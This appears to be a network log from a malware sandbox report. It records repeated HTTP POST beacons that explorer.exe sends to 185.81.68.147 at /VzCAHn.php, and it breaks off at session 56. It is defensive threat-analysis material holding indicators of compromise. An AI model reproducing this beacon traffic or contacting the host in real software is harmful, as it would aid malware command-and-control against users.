                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      36192.168.2.849746185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:11.781506062 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:11.902003050 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:13.385603905 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:12 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      37192.168.2.849747185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:13.625374079 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:13.746149063 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:15.071438074 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:14 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      38192.168.2.849748185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:15.385389090 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:15.505170107 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:16.892796993 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:16 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      39192.168.2.849750185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:17.128998995 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:17.248821974 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:18.731002092 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:17 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      40192.168.2.849751185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:18.968734980 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:19.088586092 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:20.604249954 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:19 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      41192.168.2.849753185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:20.874489069 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:20.994328022 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:22.480416059 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:21 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      42192.168.2.849754185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:22.703037024 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:22.823024988 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:24.156538010 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:23 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      43192.168.2.849755185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:24.390672922 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:24.510447025 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:25.998195887 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:25 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      44192.168.2.849756185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:26.250619888 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:26.370508909 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:27.694597960 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:26 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      45192.168.2.849757185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:27.921786070 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:28.041588068 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:29.536186934 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:28 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      46192.168.2.849758185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:29.767126083 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:29.887168884 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.385351896 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:30 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      47192.168.2.849759185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.610156059 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:31.731168985 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.230658054 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:32 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      48192.168.2.849760185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.458137989 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:33.578124046 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:34.917346954 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:34 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      49192.168.2.849761185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:35.164423943 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:35.293823957 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:36.760782003 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:35 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      50192.168.2.849762185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:37.000183105 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:37.120145082 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:38.624383926 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:37 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      51192.168.2.849763185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:38.859333992 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:38.979604006 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.303961992 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:39 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      52192.168.2.849764185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.531418085 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:40.651293993 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:42.154747009 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:41 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      53192.168.2.849765185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:42.440339088 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:42.560244083 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:44.060909033 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:43 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      54192.168.2.849766185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:44.296618938 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:44.416454077 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:45.914441109 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:44 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      55192.168.2.849767185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      Dec 17, 2024 10:16:46.140492916 CET278OUTPOST /VzCAHn.php?2F409E82DCA61388941053 HTTP/1.1
                                                                                                                                                                                                                      Host: 185.81.68.147
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Content-type: text/html
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                      Dec 17, 2024 10:16:46.260622978 CET6OUTData Raw: 45 51 0d 5f
                                                                                                                                                                                                                      Data Ascii: EQ_
                                                                                                                                                                                                                      Dec 17, 2024 10:16:47.587606907 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Tue, 17 Dec 2024 17:16:46 GMT
                                                                                                                                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                      X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      56192.168.2.849768185.81.68.147804084C:\Windows\explorer.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
